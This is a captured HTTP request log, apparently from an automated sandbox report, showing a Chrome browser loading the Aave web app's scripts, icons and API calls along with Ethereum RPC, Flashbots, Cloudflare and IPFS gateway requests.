Source: global trafficHTTP traffic detected: GET /icons/flags/el.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/merit/aprs HTTP/1.1Host: apps.aavechan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://app.aave.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1000-d55cf0a9cf45dbc9.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5903-60cd3e3225910723.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5315-d41068d7bd9e64db.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4284-b57bc1e747434eb3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4506-02a1164e49710964.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-92ce489f6f7c51ed.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-37e08f82b0681cde.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/82-c4138125c2feb6d3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7715-d9ff1ad95acbdf2d.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-ExtraBold.d65f0281.woff2 HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.aave.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rpc.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6083-20b4cdfe836910e6.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_ssgManifest.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_buildManifest.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: eth-mainnet.public.blastapi.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4245-42e3ee29ff341df5.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/merit/aprs HTTP/1.1Host: apps.aavechan.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/markets-4f45529ba852aa6f.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/ZcUTDKp_rDmFKouqSkKwt/_middlewareManifest.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/staking-81c5f92db5f61cfe.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-59c4c0609aba862f.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start/ HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/fr.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/en.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/el.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9605-bf04d5bf386627f4.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1315-7550bff8c0343bd6.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/flags/es.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3000-a40fb3af74ef8ff5.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1000-d55cf0a9cf45dbc9.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5903-60cd3e3225910723.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/governance-a17757b11c661747.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/v3-migration-baa8f5f0ea1977d8.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/rpc/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5315-d41068d7bd9e64db.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /staking/ HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
